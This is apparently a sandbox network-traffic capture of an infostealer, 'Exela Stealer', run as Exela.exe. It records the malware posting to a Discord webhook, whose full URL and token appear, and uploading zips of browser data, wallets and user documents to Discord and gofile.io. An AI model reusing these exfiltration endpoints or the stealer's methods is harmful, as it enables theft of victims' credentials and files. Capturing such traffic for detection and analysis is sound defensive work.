                                                                                                  2192.168.2.749984162.159.134.2334432980C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-12 06:11:28 UTC281OUTPOST /api/webhooks/1320429670621118475/ZA2SDlHOyGg_8gIHOPb_StHSHJUvDXjQVsMohQrFJXzcZqXUB4PdHnGLRGgaGXchQyP9 HTTP/1.1
                                                                                                  Host: discordapp.com
                                                                                                  Content-Type: application/json
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  User-Agent: Python/3.10 aiohttp/3.11.11
                                                                                                  Content-Length: 512
                                                                                                  2025-01-12 06:11:28 UTC512OUTData Raw: 7b 22 75 73 65 72 6e 61 6d 65 22 3a 20 22 45 78 65 6c 61 20 53 74 65 61 6c 65 72 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 2a 2a 2a 45 78 65 6c 61 20 53 74 65 61 6c 65 72 2a 2a 2a 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 2a 2a 2a 4b 65 79 77 6f 72 64 20 52 65 73 75 6c 74 2a 2a 2a 22 2c 20 22 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 45 78 65 6c 61 53 74 65 61 6c 65 72 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 30 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 45 78 65 6c 61 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 71 75 69 63 61 78 64 2f 45 78 65 6c 61 2d 56 32 2e 30 22 7d 2c 20 22 74 68 75 6d
                                                                                                  Data Ascii: {"username": "Exela Stealer", "embeds": [{"title": "***Exela Stealer***", "description": "***Keyword Result***", "url": "https://t.me/ExelaStealer", "color": 0, "footer": {"text": "https://t.me/ExelaStealer | https://github.com/quicaxd/Exela-V2.0"}, "thum
                                                                                                  2025-01-12 06:11:28 UTC1107INHTTP/1.1 204 No Content
                                                                                                  Date: Sun, 12 Jan 2025 06:11:28 GMT
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Connection: close
                                                                                                  Set-Cookie: __dcfduid=0f92e6ccd0ac11efb060f68100a105d3; Expires=Fri, 11-Jan-2030 06:11:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                  strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                  x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                  x-ratelimit-limit: 5
                                                                                                  x-ratelimit-remaining: 4
                                                                                                  x-ratelimit-reset: 1736662289
                                                                                                  x-ratelimit-reset-after: 1
                                                                                                  via: 1.1 google
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5kOak84shaLqHRk56yPEJc9OjVYi7CFyI1ypGuMFtok%2Ft4Ds9EXjmVTiLwImtsOAxm6Dzh3OOkKDmoHV1zi5M1F3yh7oRgudJ8PZbk0RU4h6jethSpHlgLw28XNSMDFV"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Set-Cookie: __sdcfduid=0f92e6ccd0ac11efb060f68100a105d353bf0f8d18177f290ea103a396d165e4c89b0eade74b13bb9a4d4aa3f61b446f; Expires=Fri, 11-Jan-2030 06:11:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                  2025-01-12 06:11:28 UTC626INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 71 4c 75 68 43 70 38 62 30 4a 49 53 33 74 66 56 66 42 41 71 7a 45 4d 4e 4a 68 55 78 35 67 46 75 48 61 42 42 32 34 63 57 35 4c 38 2d 31 37 33 36 36 36 32 32 38 38 2d 31 2e 30 2e 31 2e 31 2d 48 48 59 68 2e 45 78 38 67 59 66 36 70 46 62 43 73 5f 41 2e 53 49 5f 59 5a 69 69 5f 70 61 69 61 46 36 6e 73 35 4a 47 66 70 68 6b 4e 44 56 70 4b 64 50 65 50 64 7a 75 41 5f 79 74 56 34 70 41 71 77 43 45 6c 71 6a 45 46 35 39 77 72 56 66 54 77 33 4c 59 65 51 67 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 53 75 6e 2c 20 31 32 2d 4a 61 6e 2d 32 35 20 30 36 3a 34 31 3a 32 38 20 47 4d 54 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72
                                                                                                  Data Ascii: Set-Cookie: __cf_bm=qLuhCp8b0JIS3tfVfBAqzEMNJhUx5gFuHaBB24cW5L8-1736662288-1.0.1.1-HHYh.Ex8gYf6pFbCs_A.SI_YZii_paiaF6ns5JGfphkNDVpKdPePdzuA_ytV4pAqwCElqjEF59wrVfTw3LYeQg; path=/; expires=Sun, 12-Jan-25 06:41:28 GMT; domain=.discordapp.com; HttpOnly; Secur


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  3192.168.2.749985162.159.135.2334432980C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-12 06:11:29 UTC797OUTPOST /api/webhooks/1320429670621118475/ZA2SDlHOyGg_8gIHOPb_StHSHJUvDXjQVsMohQrFJXzcZqXUB4PdHnGLRGgaGXchQyP9 HTTP/1.1
                                                                                                  Host: discordapp.com
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  User-Agent: Python/3.10 aiohttp/3.11.11
                                                                                                  Cookie: __cf_bm=kRe3h6kKuo2DPgTLbd_NANk.MBp9xeqzMc0IhXmJbSk-1736662287-1.0.1.1-QCqEftWaMiWPUWFq9jyTUSsXbWbVWuqfZ6ZMWc70ygIlPXxgQ6jp5_.OEYfuk.P3k09phrRB5vIK2GKn7oM5_g; __cfruid=845f3cb9bc9bbeee108c1c6130b8f83b27653c85-1736662287; __dcfduid=0f26544ed0ac11ef80d5ba8b98d27b3f; __sdcfduid=0f26544ed0ac11ef80d5ba8b98d27b3fc5579229b5329e1871465a91b048bb8ca973bfaee3a736a7707de73121f03735; _cfuvid=D_QK7z_jZ5INFLeHJv_tQnl7ZycekPUVTuCe7EpHR1U-1736662287908-0.0.1.1-604800000
                                                                                                  Content-Length: 672933
                                                                                                  Content-Type: multipart/form-data; boundary=2215b2dc4b7347aabe8dea1695f9bcc5
                                                                                                  2025-01-12 06:11:29 UTC36OUTData Raw: 2d 2d 32 32 31 35 62 32 64 63 34 62 37 33 34 37 61 61 62 65 38 64 65 61 31 36 39 35 66 39 62 63 63 35 0d 0a
                                                                                                  Data Ascii: --2215b2dc4b7347aabe8dea1695f9bcc5
                                                                                                  2025-01-12 06:11:29 UTC140OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 31 39 38 38 32 37 34 32 2d 43 43 35 36 2d 31 41 35 39 2d 39 37 37 39 2d 46 42 38 43 42 46 41 31 45 32 39 44 2e 7a 69 70 22 0d 0a 0d 0a
                                                                                                  Data Ascii: Content-Type: application/octet-streamContent-Disposition: form-data; name="file"; filename="19882742-CC56-1A59-9779-FB8CBFA1E29D.zip"
                                                                                                  2025-01-12 06:11:29 UTC16384OUTData Raw: 50 4b 03 04 14 00 00 00 00 00 6d 09 2c 5a 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 42 72 6f 77 73 65 72 73 2f 50 4b 03 04 14 00 00 00 00 00 6c 09 2c 5a 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 57 61 6c 6c 65 74 73 2f 50 4b 03 04 14 00 00 00 08 00 6d 09 2c 5a 47 98 57 8b af ff 09 00 d3 45 0a 00 0f 00 00 00 44 69 73 70 6c 61 79 20 28 31 29 2e 70 6e 67 6c bb 07 50 53 5b f8 f5 7d 12 40 8a 4a 47 40 7a 95 a2 d4 cb 05 a4 77 44 a5 aa f4 80 14 a3 46 29 52 42 4d 82 80 54 e9 88 28 10 04 15 bd 52 04 a4 86 2e 1d 04 0b 52 a4 f7 16 02 84 92 84 24 f0 86 7b df f2 9f 6f be 61 98 93 e4 ec 93 90 61 3d eb f9 ad bd f7 49 b0 b6 34 3b cf 72 91 05 00 80 f3 d7 cc 8d 6d 01 80 81 f6 90 1e 60 3a 43 3b b4 64 ee 1b d1 0e a0 00 5b 33 43 a0 7c 48 70 fd f4 14 d4 e0 a6 01 00
                                                                                                  Data Ascii: PKm,ZBrowsers/PKl,ZWallets/PKm,ZGWEDisplay (1).pnglPS[}@JG@zwDF)RBMT(R.R${oaa=I4;rm`:C;d[3C|Hp
                                                                                                  2025-01-12 06:11:29 UTC16384OUTData Raw: d9 79 a4 b0 e8 8c 8e 3a cb 77 2e f2 0f 36 e3 60 83 9a 50 b1 35 7d d2 fb ef 9e cf 5f aa be 7f eb e9 53 06 4e 0b 0a 67 3d 40 d5 7b 0a 11 2c c8 0d 34 42 2f a0 46 a4 04 75 e6 72 7d f2 3d 8b f3 16 52 49 b1 d4 bf 7a c2 1d 36 f7 7b 46 6e 93 c5 42 67 31 65 94 4e 8d 93 a0 62 4f 6f c1 1d 6e 4e b3 04 8d 4b 8c 95 2f d2 71 6d 34 e1 96 44 60 5f 37 cc 39 3f 37 05 3a 04 14 4e c2 08 78 36 c4 55 9e 70 d8 bc cd b6 c2 c9 f7 e5 70 ef 9f 3e e9 31 68 a4 ce 8d f8 56 8b 59 2a 7c 32 34 56 e5 64 46 0f 0e 77 d9 fb 80 63 3c 5d 8b f3 db 57 61 9f 39 53 0a 44 3c 21 24 85 9c 27 3e a3 85 c3 f0 d7 80 76 f8 3f c0 a3 4e 11 8a 87 23 91 ea 32 61 bf e2 49 52 2f 01 b4 0f 78 68 30 a1 f3 ef ec 08 c6 24 c3 a2 e9 39 0d 94 57 c5 ff 5d 6f fe 77 5b c4 29 2f 9f 52 05 4d 91 b4 81 b9 32 80 2a cd 96 8b 3a
                                                                                                  Data Ascii: y:w.6`P5}_SNg=@{,4B/Fur}=RIz6{FnBg1eNbOonNK/qm4D`_79?7:Nx6Upp>1hVY*|24VdFwc<]Wa9SD<!$'>v?N#2aIR/xh0$9W]ow[)/RM2*:
                                                                                                  2025-01-12 06:11:29 UTC16384OUTData Raw: 0a c4 d6 df 78 a2 1c b8 6f b0 6f b0 ca b7 32 97 1b 8d f5 26 0b 99 0d c9 93 57 08 36 80 c2 66 cf 55 5e e4 4f 2e 55 ac b0 46 99 0b a7 ee 0a ef 0c 56 8f f0 18 4c 1a d5 73 b3 8c 95 b0 43 a6 47 56 9f ba 66 10 b7 5e 5b 9c ca dd d8 cd f8 df 1a ef df fc 26 60 ca ec 16 a1 d9 23 39 b7 19 36 25 a0 b5 df 42 28 db 49 34 4c cb 55 19 78 a8 2d 9b 07 1e 38 a7 eb ff 78 d9 a4 e8 a7 c7 63 e2 4b ed ce 16 b5 5c c5 b6 29 01 a1 92 16 1b ac fc 4a 46 60 82 61 25 93 22 8b 2a a8 74 bf b8 78 20 5b 6d 63 e5 62 4d c1 45 ac a2 f2 5c 7e 11 ca a2 29 72 75 b4 21 2f bc 9f 3f aa d0 d8 b3 12 78 33 82 ab 8d af 03 5f 4b bb 97 a0 2b 23 e1 2f 23 92 e6 c3 5c a8 19 e3 fc 34 5b 34 02 aa 85 23 1f 33 9d 27 6e 9c 75 df 38 a6 d7 97 82 de 3d 39 1d 61 5a 64 95 01 e7 e5 a9 ec 1c 39 a1 43 e8 2c fe e0 2f e6
                                                                                                  Data Ascii: xoo2&W6fU^O.UFVLsCGVf^[&`#96%B(I4LUx-8xcK\)JF`a%"*tx [mcbME\~)ru!/?x3_K+#/#\4[4#3'nu8=9aZd9C,/
                                                                                                  2025-01-12 06:11:29 UTC16384OUTData Raw: 26 98 70 99 f9 5e 76 ff 7d 1a f7 7f c6 8b 1b 17 be ea bb 02 8c 58 83 87 cc 06 b8 3e 7a 16 a0 d9 5d 7d ea 35 e8 61 d6 95 d5 92 58 53 ee e6 ff fc e5 58 b3 ac b5 d5 a7 7a fe 0c 00 fc 64 cb 33 02 27 9a fe 20 94 3a 68 08 20 37 6a 23 6d 01 3e e1 63 22 1d a0 6b a1 84 9e c6 0b 13 73 a3 ab b8 84 08 f0 be b3 50 44 69 81 28 26 dc 5e 10 fd 80 33 4f 9a 0d 98 40 b0 c4 5d e1 aa 73 33 4c 0f 7a f7 3e f2 bd 7b 5f 95 3a bb 3b 26 e1 59 0a 99 bd d4 14 60 34 3a 25 62 2a 55 f0 4c ad e2 15 00 a3 3e 07 39 48 09 14 42 cf 28 e3 0e 85 dd 27 f6 8e f2 18 94 d1 cc f8 d0 3c 50 82 da 22 9f 0a 79 47 c3 a6 bb b0 2f e0 7c 10 a7 00 67 3b f6 fa c3 17 80 1b 7d 32 33 ce 86 9c 3c 0d a2 95 66 e9 4f ce ab 8b ec ca d0 44 83 c5 ed 90 d8 48 1f 95 7d 1e c8 e9 ef 27 9a 95 38 0f 94 eb 6d d7 81 ea 8f 25
                                                                                                  Data Ascii: &p^v}X>z]}5aXSXzd3' :h 7j#m>c"ksPDi(&^3O@]s3Lz>{_:;&Y`4:%b*UL>9HB('<P"yG/|g;}23<fODH}'8m%
                                                                                                  2025-01-12 06:11:29 UTC16384OUTData Raw: ad b2 e0 72 ac 57 6b 4a 84 57 d9 03 69 d2 52 25 67 5e 88 f6 54 65 38 6f 37 cd 0f ff 69 4b 12 d2 fb df c0 a4 52 9d d3 43 9c a7 d9 c1 d3 a8 2a 72 e2 62 ba 20 24 e6 e7 cd 2f 28 03 fe d8 01 c5 75 45 d9 01 52 d4 0f 14 d1 b7 1f bd 12 81 0b 42 4b 31 fb 22 ae e1 12 00 0f aa 14 b0 24 d5 cc 9a 72 a3 2a 72 49 91 f2 d6 a9 a1 ae ea 03 92 3b 63 be e9 e3 8b 5f 0d 68 fa ab 3e 23 c4 9d 93 ed 6e 87 bb f1 ec a5 e0 b6 89 73 33 36 b3 ea 16 fc 2a d7 81 5b c7 86 42 c2 c3 50 8d 0f 27 34 46 87 22 e7 d8 87 31 8a c5 54 58 bc ea ee 88 42 ca 5a d6 82 1d fd 42 4e 27 ba 78 59 ad ea 44 30 2f 6c 0e aa a9 2f c0 29 6f bd c5 af 76 8b 5c 28 ae 65 4d fe 26 05 75 d3 5c e9 2f d2 31 cb 2a fa aa cb 64 a0 7e ae 04 01 f1 4b 8b 34 cc b1 ce 11 fa 40 c5 85 a7 86 62 9a cc 17 cf 06 fb 9a b0 cc 87 94 d8
                                                                                                  Data Ascii: rWkJWiR%g^Te8o7iKRC*rb $/(uERBK1"$r*rI;c_h>#ns36*[BP'4F"1TXBZBN'xYD0/l/)ov\(eM&u\/1*d~K4@b
                                                                                                  2025-01-12 06:11:29 UTC16384OUTData Raw: d1 9a de a2 ec 1e 6f 5a 55 fe d1 16 fe a6 ef 4b f5 41 b0 fe 77 b9 e6 14 73 1c 5c 44 5a 1c e5 7e 5c e6 20 f3 93 07 ab 4b 94 2c 25 24 45 3f 16 2d ec 5d b4 79 e9 7e ec d3 f0 4a eb df 2d 65 b7 cc a2 c4 44 9b f1 01 f3 85 eb de 51 35 6e b4 70 cb e2 25 33 ff b1 5f 59 85 92 bd 63 43 31 7e 54 b4 ab 99 e3 c9 0f f9 bd 50 9d 14 da 26 a1 b0 9f 1b b4 e8 39 69 cf 6b ab 56 b9 0a 25 e2 3a 31 2b f5 87 9b 79 77 47 15 07 75 a8 09 6b c9 a4 43 b3 36 84 ce e1 d6 b9 2f 84 3d 25 7a c5 5f c8 73 37 e8 eb 59 e3 b3 2c 18 1b f4 6b 3d fa 19 73 f0 7a 9b cd ce 2f ac ea 51 d8 da 84 18 bd 6b ad aa 97 20 c1 14 4d 23 94 39 88 74 99 75 27 03 98 0b e6 d8 9e 4f 5d 16 69 85 09 00 02 60 93 c2 af 40 7b 0d aa b9 bd 5a d6 2b 1f 81 d9 2a 04 64 52 86 5e 25 0d f8 51 07 2f 2a 00 79 b4 83 0e 73 74 ff e1
                                                                                                  Data Ascii: oZUKAws\DZ~\ K,%$E?-]y~J-eDQ5np%3_YcC1~TP&9ikV%:1+ywGukC6/=%z_s7Y,k=sz/Qk M#9tu'O]i`@{Z+*dR^%Q/*yst
                                                                                                  2025-01-12 06:11:29 UTC16384OUTData Raw: 31 2a 1d e4 6a 9f 89 2e 9d da f4 3d c7 03 1f de db 9b 91 3f 66 5a 4b aa dd ee c6 ad 3b 92 21 f5 e2 50 aa 7a f9 66 cd 55 f5 f2 fb 1d 85 54 5d cd 4e 2d 22 c7 d1 f8 75 6d 66 8d ac 6f 44 71 e3 26 45 ce a2 e7 f1 c5 33 bc 0d 21 ad e7 52 4f 07 69 75 e6 f1 95 f1 e6 b6 05 aa 80 16 2a 2d 41 59 f1 cd f6 f7 1a fd 62 8f 80 7d 4f 68 4e 0d e6 0f 8d aa 66 0b 3d b4 81 48 a3 34 ec 6c 84 6e 57 f9 58 6b f2 05 4f 3e a0 fe d1 d9 3a 2e fb b2 75 22 cd dd e8 e1 af c7 df 19 25 54 6d fc ed 63 9a ca 87 d1 e0 86 91 b7 6d 23 ee 27 bc b3 c5 3d 80 cd f0 38 eb 7c 69 57 e9 1a eb 6e d1 ec d2 23 f2 d6 66 44 bd eb 57 03 b1 31 bd 79 f9 55 c5 a7 8a 67 b5 fb 6a f3 f5 02 0e a0 c5 21 3b d1 30 8b d9 c7 17 7d e2 54 18 55 6f 5a 8c c7 ba 1f ac e8 9e a9 e5 eb ae a3 da e7 d0 cc be 51 2a 9d e3 be 13 7a
                                                                                                  Data Ascii: 1*j.=?fZK;!PzfUT]N-"umfoDq&E3!ROiu*-AYb}OhNf=H4lnWXkO>:.u"%Tmcm#'=8|iWn#fDW1yUgj!;0}TUoZQ*z
                                                                                                  2025-01-12 06:11:29 UTC16384OUTData Raw: d2 bc f8 b1 82 b4 33 76 18 84 ae 7e c3 e4 8a 7b 45 ea 5f 4b 46 60 0f df de 5c 35 86 34 f2 40 06 53 b8 f7 9c 07 c2 23 d1 da 3f 87 61 e4 74 4e bc c9 5c 83 14 44 30 ac 7c 7e f9 1c 8f 87 4b 15 d3 57 2c fd ce 9b e0 b6 fd d3 c2 c4 7e c4 c9 b9 e6 a5 10 8d 7d f4 e1 78 21 c6 97 de b4 05 22 d7 20 4c a7 07 08 5a 16 8b 45 ca 40 0a c2 6b 2a 79 17 d7 29 f7 f7 1d ae 75 4d eb 67 cc 37 87 09 e7 ed fd 9f c1 fd 15 2b 13 7b 6e 13 44 62 bf 25 5d 11 c9 c8 e9 d8 d7 52 3e af 23 fd 7c e4 92 91 5b 2d 12 fb d3 f4 66 aa c4 fe 9a f0 fd 35 5f af 8f d3 12 62 03 5b 97 e8 8d 2b 58 2b 7a 0d f9 2b a6 2c e5 51 b3 2a 6e 24 e4 e5 78 4b c9 60 83 e6 23 4d fd 50 ba 3f 72 82 18 9d 75 d9 db d1 77 fc ea 1a b1 ba 2c 47 11 13 b6 dd 59 5d 85 b1 25 95 dd 9a bc 4a d4 7c 9d d4 71 f8 65 b3 1e 5e b5 68 d9
                                                                                                  Data Ascii: 3v~{E_KF`\54@S#?atN\D0|~KW,~}x!" LZE@k*y)uMg7+{nDb%]R>#|[-f5_b[+X+z+,Q*n$xK`#MP?ruw,GY]%J|qe^h
                                                                                                  2025-01-12 06:11:30 UTC833INHTTP/1.1 200 OK
                                                                                                  Date: Sun, 12 Jan 2025 06:11:30 GMT
                                                                                                  Content-Type: application/json
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                  x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                  x-ratelimit-limit: 5
                                                                                                  x-ratelimit-remaining: 4
                                                                                                  x-ratelimit-reset: 1736662291
                                                                                                  x-ratelimit-reset-after: 1
                                                                                                  vary: Accept-Encoding
                                                                                                  via: 1.1 google
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7iaXnJwus9Ix%2F41JVXRt1wTLXILw75iUASarlJSYLRCHA2%2F1E9XIuTcDQS1oQzEe0w4z%2Bmh4V8I3vv%2BdHGAiz4G7%2Bi1NF105%2BXRHCE2aRhequ1YzKQUS6Ae%2BhCBTIEbs"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 900afd4baae472a5-EWR


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  4192.168.2.74999051.91.7.64432980C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-12 06:11:31 UTC134OUTGET /getServer HTTP/1.1
                                                                                                  Host: api.gofile.io
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  User-Agent: Python/3.10 aiohttp/3.11.11
                                                                                                  2025-01-12 06:11:31 UTC1146INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.27.1
                                                                                                  Date: Sun, 12 Jan 2025 06:11:31 GMT
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Content-Length: 14
                                                                                                  Connection: close
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                  Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                  Origin-Agent-Cluster: ?1
                                                                                                  Referrer-Policy: no-referrer
                                                                                                  Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-DNS-Prefetch-Control: off
                                                                                                  X-Download-Options: noopen
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  X-Permitted-Cross-Domain-Policies: none
                                                                                                  X-XSS-Protection: 0
                                                                                                  ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A"
                                                                                                  X-Robots-Tag: noindex, nofollow
                                                                                                  2025-01-12 06:11:31 UTC14INData Raw: 65 72 72 6f 72 2d 6e 6f 74 46 6f 75 6e 64
                                                                                                  Data Ascii: error-notFound


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  5192.168.2.74999145.112.123.2274432980C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-12 06:11:32 UTC240OUTPOST /uploadFile HTTP/1.1
                                                                                                  Host: store1.gofile.io
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  User-Agent: Python/3.10 aiohttp/3.11.11
                                                                                                  Content-Length: 37581
                                                                                                  Content-Type: multipart/form-data; boundary=d5594edab89946da91a68a41e5383196
                                                                                                  2025-01-12 06:11:32 UTC36OUTData Raw: 2d 2d 64 35 35 39 34 65 64 61 62 38 39 39 34 36 64 61 39 31 61 36 38 61 34 31 65 35 33 38 33 31 39 36 0d 0a
                                                                                                  Data Ascii: --d5594edab89946da91a68a41e5383196
                                                                                                  2025-01-12 06:11:32 UTC127OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 7a 69 70 2d 63 6f 6d 70 72 65 73 73 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 74 65 61 6c 65 64 46 69 6c 65 73 42 79 45 78 65 6c 61 2e 7a 69 70 22 0d 0a 0d 0a
                                                                                                  Data Ascii: Content-Type: application/x-zip-compressedContent-Disposition: form-data; name="file"; filename="StealedFilesByExela.zip"
                                                                                                  2025-01-12 06:11:32 UTC16384OUTData Raw: 50 4b 03 04 14 00 00 00 00 00 6f 09 2c 5a 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 44 65 73 6b 74 6f 70 2f 50 4b 03 04 14 00 00 00 00 00 6f 09 2c 5a 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 00 00 44 6f 63 75 6d 65 6e 74 73 2f 50 4b 03 04 14 00 00 00 00 00 6f 09 2c 5a 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 00 00 44 6f 77 6e 6c 6f 61 64 73 2f 50 4b 03 04 14 00 00 00 00 00 6f 09 2c 5a 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 4c 46 4f 50 4f 44 47 56 4f 48 2f 50 4b 03 04 14 00 00 00 00 00 6f 09 2c 5a 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 4c 49 4a 44 53 46 4b 4a 5a 47 2f 50 4b 03 04 14 00 00 00 08 00 d6 1e 45 57 52 e3 0d dc 83 02 00 00 02 04 00 00 16 00 00 00 44 65 73 6b 74 6f 70 2f 41 51 52 46 45 56 52 54 47 4c 2e 6a 70 67 15 93 47
                                                                                                  Data Ascii: PKo,ZDesktop/PKo,ZDocuments/PKo,ZDownloads/PKo,ZLFOPODGVOH/PKo,ZLIJDSFKJZG/PKEWRDesktop/AQRFEVRTGL.jpgG
                                                                                                  2025-01-12 06:11:32 UTC16384OUTData Raw: 9e de 54 7f dc a5 22 aa 9f 8f ab e5 3b fb 9c cb 97 b5 ac b7 0b dc 9c 6e 33 45 cb 9d d3 9c a3 d4 92 e9 02 b6 6f 05 ab 7a 14 50 73 62 15 a8 ec 31 75 1a 89 e3 95 d9 55 50 3e 1d c2 e9 95 22 3f e3 ee d0 a5 df 50 a3 92 78 d5 ea 41 ea 4c 82 ac d1 77 5c 00 4e 8b 99 86 4e 3d 28 34 72 fa b0 ed dc de 75 97 4e ee b1 c2 74 cd 65 62 20 7d 63 f9 22 80 76 ad 0e 7f 7c 78 af 94 13 42 e8 2d 61 e4 f9 99 8d 11 44 f1 c8 e0 c2 a7 7d 41 95 f6 fa 94 ad c3 80 ef 15 94 a9 55 2b 80 b4 f5 55 06 63 70 89 8a 87 34 a2 6e 86 2c 4c 6c c5 c6 a8 42 05 e9 7e 6b ae 1f ee e8 c6 d8 82 d2 ee b0 66 39 71 cf 93 b0 5c 31 9b e0 8c b3 bc b3 23 9f e0 8f 31 03 9b cd 66 24 db ac fe 02 6f b7 2c 6f 8f cb 7c 98 27 59 dc 55 7a ef 5c 55 9f 1f 5d f5 12 71 2c db 5d 55 75 5a f9 dd 19 2e 6f 38 59 51 e1 c6 e9 df
                                                                                                  Data Ascii: T";n3EozPsb1uUP>"?PxALw\NN=(4ruNteb }c"v|xB-aD}AU+Ucp4n,LlB~kf9q\1#1f$o,o|'YUz\U]q,]UuZ.o8YQ
                                                                                                  2025-01-12 06:11:32 UTC4610OUTData Raw: f4 42 1e 3c a5 f7 1d 09 e2 0b 62 0b 99 94 15 e6 f0 65 2b af d6 d1 cd 13 0e a6 a9 8e 9b 9b f6 07 35 fa 3c db 5c 93 e9 e5 ea 9f 5f 39 12 8f 52 1c 7c da b9 af e1 77 96 e2 47 7f bb 6f bd 3f 47 8a c5 97 e3 6d da 62 3e a2 6b 66 32 6b c1 32 b1 d5 16 77 71 9e 9e 69 74 95 f0 a9 8a e7 57 70 67 ac f3 89 ba bf b0 5b 17 4e 9a d4 96 0c aa 0c 56 a6 7c 76 ab 4d b5 db 83 ad 5e 73 9d 3f f5 3b fc e6 52 06 58 bd d6 fe c2 ca e9 67 e7 57 f1 e6 a3 ab e7 9b 91 37 e1 13 3d 35 cf e2 6c 31 af d5 10 31 62 7f 18 02 a3 f5 6b 61 5e 0a f5 25 91 d1 b3 75 e7 5b 88 40 36 c4 c2 9e 82 46 b2 3d e2 26 7f e5 63 b9 75 84 d0 96 3a c5 06 64 a8 19 91 55 35 75 17 f0 31 bc f2 75 ca 0a 12 19 a9 85 92 9d e0 8d 6c ab 6f de a3 da 2e 62 42 be 49 eb 39 4c e9 49 9d 70 7f 7f ff 50 4b 03 04 14 00 00 00 08 00
